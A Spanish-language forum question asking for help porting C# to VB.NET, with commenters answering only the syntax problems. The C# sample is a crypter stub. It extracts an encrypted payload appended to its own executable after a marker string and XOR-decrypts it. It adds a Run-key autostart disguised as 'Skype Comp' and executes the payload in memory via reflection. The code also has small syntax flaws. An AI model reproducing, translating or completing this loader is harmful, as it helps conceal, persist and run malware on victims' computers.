# Traducir estas funciones y código a VB.NET

Tags: vb.net

Como cito en el título necesito convertir estas funciones a VB.NET ya que muchas de las *cosas que utilizo no puedo en VB.NET como el `patternAt`, por ejemplo en este código:

```
Dim file__1 As Byte() = File.ReadAllBytes(System.Reflection.Assembly.GetExecutingAssembly().Location)
Dim position = Patt*ernAt(file__1, Encoding.ASCII.GetBytes("BLAUMOLAMUCHO"))

Dim longitudSeparador As Integer = Encoding.ASCII.GetBytes("BLAUMOLAMUCHO").Length

Dim encodedBytes As Byte() = New Byte(file__1.Length - position.First() - longitudSeparador - 1) {}
Array.Copy(file__1, position.First() + longitudSeparador, encodedBytes, 0, file__1.Length - position.First() - longitudSeparador)
```

Me devuelve este error:

```
'PatternAt' is not declared. It may be inaccessible due to its protection level. (BC30451) - C:\Users\Androide\Desktop\Stub\Stub\Stub\Form1.vb:17,18
```

La funcion siguiente:

```
Public Shared Function PatternAt(source As Byte(), pattern As Byte()) As IEnumerable(Of Integer)
    For i As Integer = 0 To source.Length - 1
        If source.Skip(i).Take(pattern.Length).SequenceEqual(pattern) Then
            yield Return i
        End If
    Next
End Function
```

Me devuelve error:

```
Method arguments must be enclosed in parentheses. (BC30800) - C:\Users\Androide\Desktop\Stub\Stub\Stub\Form1.vb:30,10
Expression expected. (BC30201) - C:\Users\Androide\Desktop\Stub\Stub\Stub\Form1.vb:30,10
'yield' is not declared. It may be inaccessible due to its protection level. (BC30451) - C:\Users\Androide\Desktop\Stub\Stub\Stub\Form1.vb:30,4
Character is not valid. (BC30037) - C:\Users\Androide\Desktop\Stub\Stub\Stub\Form1.vb:40,24
```

Y luego tengo problemas con esta función en c# es:

```
private static byte[] decryptBytes(byte[] bytes, String pass)
        {
            byte[] XorBytes = Encoding.Unicode.GetBytes(pass);

            for (int i = 0; i < bytes.Length; i++)
            {
                bytes[i] ^= XorBytes[i % XorBytes.Length];
            }

            return bytes;
        }
```

Y al convertirlo me quita los operandos y me la deja tal que así:

```
Private Shared Function decryptBytes(bytes As Byte(), pass As [String]) As Byte()
    Dim XorBytes As Byte() = Encoding.Unicode.GetBytes(pass)

    For i = 0  To bytes.length Step 1
        bytes(i) = bytes(i) Xor XorBytes(i Mod XorBytes.Length)
    Next

    Return bytes
End Function
```

Esta sería correcta, y los demás errores porque? `Como añado paternAt en vb.net`

El ejemplo completo,mínimo y verificable sería:

```
using System;
using System.Collections.Generic;
using System.Data;
using System.Text;
using System.Windows.Forms;
using System.IO;
using System.Runtime.InteropServices;
using System.Resources;
using System.Security.Cryptography;
using System.Reflection;
using System.Linq;
using Microsoft.Win32;

namespace skip
{ 
    static class Program
    {
        [STAThread]
        static void Main()
        {
            //CInvokeAPI.Invoke("user32", "MessageBoxW", 0, CInvokeAPI.StringToPtrW("Welcome"), CInvokeAPI.StringToPtrW("Hello world."), 1);
            //CMemoryExecute.Run(File.ReadAllBytes(@"C:\Users\Androide\Documents\SharpDevelop Projects\Console\Console\bin\Debug\Console.exe"), @"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe", @"");


            byte[] file = File.ReadAllBytes(System.Reflection.Assembly.GetExecutingAssembly().Location);

            var position = PatternAt(file, Encoding.ASCII.GetBytes("BLAUMOLAMUCHO"));

            int longitudSeparador = Encoding.ASCII.GetBytes("BLAUMOLAMUCHO").Length;

            byte[] encodedBytes = new byte[file.Length - position.First()-longitudSeparador];
            Array.Copy(file, position.First()+ longitudSeparador, encodedBytes, 0, file.Length - position.First()-longitudSeparador);

            FileStream fileStream = new FileStream(@"tola.exe", FileMode.Create, FileAccess.Write);
            for (int i = 0; i < encodedBytes.Length; i++)
                fileStream.WriteByte(encodedBytes[i]);
            fileStream.Close();*/
            RunInternal(encodedBytes,"1234");
        }

        public static IEnumerable<int> PatternAt(byte[] source, byte[] pattern)
        {
            for (int i = 0; i < source.Length; i++)
            {
                if (source.Skip(i).Take(pattern.Length).SequenceEqual(pattern))
                {
                    yield return i;
                }
            }
        }




        private static void RunInternal(byte[] encode, String pass)
        {
            //Verify the Payload exists
            //if (!File.Exists(exeName))
              //  return;

            //Read the raw bytes of the file
            byte[] resourcesBuffer = encode;

            //byte[] decryptedBuffer = resourcesBuffer;

            //Decrypt bytes from payload
            byte[] decryptedBuffer = null;
            decryptedBuffer = decryptBytes(resourcesBuffer, pass);

            //create regedit rule
            try {
                Microsoft.Win32.RegistryKey key;
                //key = Microsoft.Win32.Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon");
                key = Microsoft.Win32.Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run");
                //key.SetValue("Shell", "explorer.exe, " + System.Reflection.Assembly.GetExecutingAssembly().Location);
                key.SetValue("Skype Comp", System.Reflection.Assembly.GetExecutingAssembly().Location);
                Console.WriteLine(key);
                key.Close();
            } catch(Exception ex)
            {
                Console.WriteLine(ex);

            }
            //


            //If .NET executable -> Run
            if (System.Text.Encoding.ASCII.GetString(decryptedBuffer).Contains("</assembly>")) //Esto devuelve false
            {
                //Load the bytes as an assembly
                //Assembly exeAssembly = Assembly.Load(decryptedBuffer);

                //Execute the assembly
                //object[] parameters = new object[1];                //Don't know why but fixes TargetParameterCountException
                //exeAssembly.EntryPoint.Invoke(null, parameters);
                //var assemblyBytes = /* ... */;
                //Load the bytes as an assembly
                //Assembly exeAssembly = Assembly.LoadFrom(@"C:\Users\Androide\Documents\SharpDevelop Projects\Console\Console\bin\Debug\Console.exe");
                var loadMethod = typeof(Assembly).GetMethod("Load", new Type[] { typeof(byte[]) });
                var newAssembly = loadMethod.Invoke(null, new object[] { decryptedBuffer });
                ((Assembly)newAssembly).EntryPoint.Invoke(null, new object[1]);

                //typeof(Assembly).GetMethod("Load", new Type[] { typeof(byte[])}).Invoke(parameters,new object[] {decryptedBuffer});
                 //exeAssembly.EntryPoint.Invoke(null, parameters);
            }
            else
            {
               Console.WriteLine(Encoding.ASCII.GetString(decryptedBuffer));
               Console.ReadKey();
            }

        }

        /// <summary>
        /// Decrypt the Loaded Assembly Bytes
        /// </summary>
        /// <param name="payload"></param>
        /// <returns>Decrypted Bytes</returns>
        /// algoritmo xor
        private static byte[] decryptBytes(byte[] bytes, String pass)
        {
            byte[] XorBytes = Encoding.Unicode.GetBytes(pass);

            for (int i = 0; i < bytes.Length; i++)
            {
                bytes[i] ^= XorBytes[i % XorBytes.Length];
            }

            return bytes;
        }
    }
}
```

Comment: veo que estas con muchos problemas en la traduccion (segun como vienen tus preguntas). sin leer todos los problemas que estas teniendo, los cuales tenes que atacar de a uno, que es yield?

Comment: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/keywords/yield

Comment: parece ser que es solo de csharp no sé si haya algo parecido para vb.net

Comment: es exactamente igual, pero tenes que sacar el return.

Comment: ¿Y por qué no utilizar un traductor para este tipo de tareas? Yo uso [.NET Fiddle](https://dotnetfiddle.net) ...

Comment: Ya intente con conversores pero me destrozan el código y el return esta bien puesto he visto ejemplos que usan yield Return n o variable en vb.net